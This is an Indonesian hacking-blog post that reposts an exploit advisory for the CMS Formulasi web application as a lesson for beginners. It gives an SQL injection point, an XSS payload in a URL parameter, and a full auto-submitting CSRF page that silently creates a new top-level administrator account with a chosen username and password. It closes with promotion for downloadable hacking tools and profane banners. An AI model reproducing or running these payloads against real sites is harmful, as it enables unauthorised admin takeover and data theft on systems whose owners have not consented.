Exploit CMS Formulasi 2017 | CSRF Vulnerability

Exploit CMS Formulasi 2017 | CSRF Vulnerability

Selamat siang para penduduk internet, terima kasih sudah berkunjung ke blog sederhana ini, semoga bermanfaat, kali ini kita akan belajar exploit cms formulasi dengan menggunakan CSRF yang ada dibawah ini, semoga succes :D

Exploit CMS Formulasi 2017 | CSRF Vulnerability

========================

SQL Injection

========================

Found on

http://localhost/formulasi/kelas-siswa.html 

parameter : kelas

post data : kelas=1{SQL_HERE}

========================

XSS Vulnerability

========================

Found On

parameter : tgl

http://localhost/cmsformulasi/index.php?p=tglberita&tgl=<script>alert(123)</script>

========================

CSRF Vulnerability

========================

---------------------BOF--------------------------------------------------

<html>

<head>

<title>Formulasi CRSFT Exploit</title>

</head>

<body onload="javascript:fireForms()">

<script language="JavaScript">

var pauses = new Array( "489","36","27" );

function pausecomp(millis)

{

    var date = new Date();

    var curDate = null;

    do { curDate = new Date(); }

    while(curDate-date < millis);

}

function fireForms()

{

    var count = 3;

    var i=0;

     

    for(i=0; i<count; i++)

    {

        document.forms[i].submit();

         

        pausecomp(pauses[i]);

    }

}

</script>

<H2>Formulasi CSRF Exploit</H2>

<form method="POST" name="form1" action="http://localhost:80/cmsformulasi/adminpanel/aplikasi/admin/admin.php?pilih=admin&untukdi=tambah">

<input type="hidden" name="nama_admin" value="usernya"/>

<input type="hidden" name="username" value="Sarahma12"/>

<input type="hidden" name="email" value="research@sarahma.co.id"/>

<input type="hidden" name="level_users" value="1"/>

<input type="hidden" name="password" value="Password12"/>

<input type="hidden" name="password_lagi" value="Password12"/>

</form>

</body>

</html>

---------------------EOF--------------------------------------------------

========================

Solution :

========================

No Update Until This Advisory published

========================

Timeline:

========================

2013-09-27 Provided details vulnerability to vendor

2013-10-01 Second NotificaTon Vendor

2013-10-04 No Response From Vendor

Sumber : https://www.exploit-db.com/

Terima kasih sudah berkunjung ke Blog ini semoga bermanfaat.

Download

Laporkan Jika Link Download Mati ! disini. [ Lapor !! ]

>> Fuck You ! ------------------------ // ~ root@Jack : ~ \\------------------------ Fuck You ! <<

Download Kumpulan Tools Hacking 100% Work

[ DOWNLOAD ] - [ DOWNLOAD ]

Yapss Admin mohon maaf jika ada kesalahan dalam penulisan atau penguploadan, jika ada kesalahan mohon dibenarkan dengan berkomentar di bawah postingan yang salah, berikan saran yang sifatnya membimbing agar blog ini bisa bermanfaat bagi para Newbie di Indonesia tentunya, Jika ingin menyumbangkan Tutornya atau Modulnya silahkan kirimkan ke Email yang sudah saya sediakan, Terimakasih Senpai :*

Greetz : ./Maniak_WiFi

\\ Like, Visit, Follow and Share

>> Facebook          **    Faris Ghaisan Rabbani    >> Twitter          **    @JackTersakiti

>> Instagram          **    /abdur.rozak.mw    >> Youtube        **   Pringsewu Cyber Team

// Why So Serious...